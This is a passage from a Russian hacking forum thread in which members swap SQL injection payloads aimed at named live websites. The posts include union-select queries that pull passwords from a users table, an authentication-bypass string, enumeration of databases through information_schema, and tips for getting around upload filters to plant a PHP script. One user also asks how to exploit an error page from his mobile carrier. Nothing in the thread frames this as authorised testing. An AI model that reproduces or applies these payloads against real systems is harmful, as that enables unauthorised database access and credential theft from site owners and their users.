Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Есть иньекция.
    Таблицы login and pass я вытащил успешно.
    Таблица users
    Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
    Как обходится этот баг?
    _brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
    _brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,count(*),5,6,7+from+users--
    
    0 записей
     
    #11542 Pashkela, 25 Feb 2010
    Last edited: 25 Feb 2010
    1 person likes this.
  3. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Не хочет в базу писать русские символы.
    Это инъекция, так что запрос только такой.
    INSERT _cat SET category='0' а дальше можно дописывать
    Code:
    INSERT _cat SET category='0', 2_category='0', name_cat='Русский', en_name_cat='sd', description='', sort_index='0'  
    есть какие то варианты туда их запихнуть всетаки)?

    Проблему решил!

    name_cat=CHAR(0xF6F3E0F6F3E0 USING cp1251)
     
    #11543 FAQ666, 25 Feb 2010
    Last edited: 25 Feb 2010
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    хз, подстава какая-то:

    Code:
    http://www.materinstvo.ru/art/4610'
    http://materinstvo.ru/?module=articles&id=4610'
    
     
    1 person likes this.
  5. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Хитрюги :)
     
  6. RuDDicK

    RuDDicK New Member

    Joined:
    6 Apr 2008
    Messages:
    13
    Likes Received:
    3
    Reputations:
    -3
    exception 'ZSecurityException' with message 'Not enough privileges! ' in /opt/appl/ecare/4.0.0_042/public/specific/ZEcareBusinessLogic.php:136 Stack trace: #0 /opt/appl/ecare/4.0.0_042/public/specific/BusinessLogic/GetUnbilledCallsBLHelper.php(55): ZEcareBusinessLogic->validateAllowedMsisdnId(''1' '2'') #1 /opt/appl/ecare/4.0.0_042/ext/Common/ZBusinessLogic.php(58): GetUnbilledCallsBLHelper->checkPrivileges() #2 /opt/appl/ecare/4.0.0_042/public/requests/listUnbilledCalls.php(21): ZBusinessLogic->execute(Array) #3 /opt/appl/ecare/4.0.0_042/public/index.php(56): include_once('/opt/appl/ecare...') #4 {main}


    парни при токой ошибке можно чтото намутить?
    это от моей мобильной телефонной компании
     
  7. Mr.Replica

    Mr.Replica Member

    Joined:
    18 May 2010
    Messages:
    124
    Likes Received:
    41
    Reputations:
    10
    Обычная ошибка....не достаточно прав для входа туды...Англ. стоит иногда учить
     
  8. RuDDicK

    RuDDicK New Member

    Joined:
    6 Apr 2008
    Messages:
    13
    Likes Received:
    3
    Reputations:
    -3
    да нет я это тока шяс заметил насчёт привилегий...
     
  9. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
     
  10. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    1)найти раскрытие в скрипте
    2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь )
    3)попробывать найти в кеше поисковиков/веб архиве
    4)побегать с бубном и угадать
     
    1 person likes this.
  11. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    Помогите плиз! Бред какойто... тренируюсь в скулях. Вот мой код

    PHP:
    if(isset($_POST['login']) && isset($_POST['password']))
    {
        
    $login=$_POST['login'];
        
    $password=md5($_POST['password']);
        
    $query="SELECT * FROM users WHERE login='$login' AND password='$password' LIMIT 1";
        echo 
    $query;
        
    $response=mysql_query($query);
        
    $result=mysql_fetch_array($response);
        if(
    $login==$result['login'] && $password==$result['password'])
            
    $_SESSION['id']=$result['id'];
    }
    if(!isset(
    $_SESSION['id']))
    {
        echo 
    "
        <form method=post>
        <table>
        <tr><td>Логин:</td><td><input type=text name=login></td></tr>
        <tr><td>Пароль:</td><td><input type=text name=password></td></tr>
        <tr><td><input type=submit name=submit value=Вход></td></tr>
        </table>"
    ;
        exit;
    }
    таблица users:

    id | login | password
    1 | admin | md5passs


    я подставляю в форму логин: admin'; --
    пароль: bla bla bla
    сделал в сурипте отладочный вывод заппроса

    PHP:
    SELECT FROM users WHERE login='admin'; --' AND password='698d51a19d8a121ce581499d7b701668' LIMIT 1
    но нифига не заходит, пишет Warning: mysql_fetch_array(): supplied argument is not a valid MySQL........
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    После каждого запроса дописывай
    Code:
    or die(mysql_error())
    ... И будешь видеть суть ошибки.
     
    1 person likes this.
  13. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    59
    Likes Received:
    4
    Reputations:
    3
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '36eba1e1e343279857ea7f69a597324e' LIMIT 1' at line 1

    помогите ктонить знающий в чём трабла?

    UPD: зашло двое мемберов и хер кто ответил...
     
    #11553 scorpic393, 25 Feb 2010
    Last edited: 25 Feb 2010
    1 person likes this.
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    admin' or 'admin'='admin' --
    (После -- пробел обязательно =\ )


    Видимо она вообще пустая =\
     
    #11554 Ctacok, 26 Feb 2010
    Last edited: 26 Feb 2010
    1 person likes this.
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Есть какая-нибудь функция для определения текущей базы без скобок???
    Всё кроме неё нашёл, мб кому-то и пригодится

    user(), current_user(), system_user(), session_user() = current_user
    version() = @@version
    ось я только как без скобок знаю @@version_compile_os
    А вот database() =???
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    можно так:

    SELECT schema_name FROM information_schema.schemata limit 0,1
    SELECT schema_name FROM information_schema.schemata limit 1,1
    .....

    не текущая, но все узнаешь, в принципе относительно по барабану, какая текущая, очень много вкусного бывает и в остальных
     
    1 person likes this.
  17. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    как можно обойти фильтрацию загружаемого файла в админке ?!
    по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?
     
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    .php5 попробуй залить
     
  19. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    не прокатило...там допустимо только JPG, GIF, PNG
     
  20. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    тоже нет...
    может я бред говорю но нельзя ли сделать что-то вроде этого
    т.е. к картинке приписать захексенный вредоносный код. не прокатит ?
     
Thread Status:
Not open for further replies.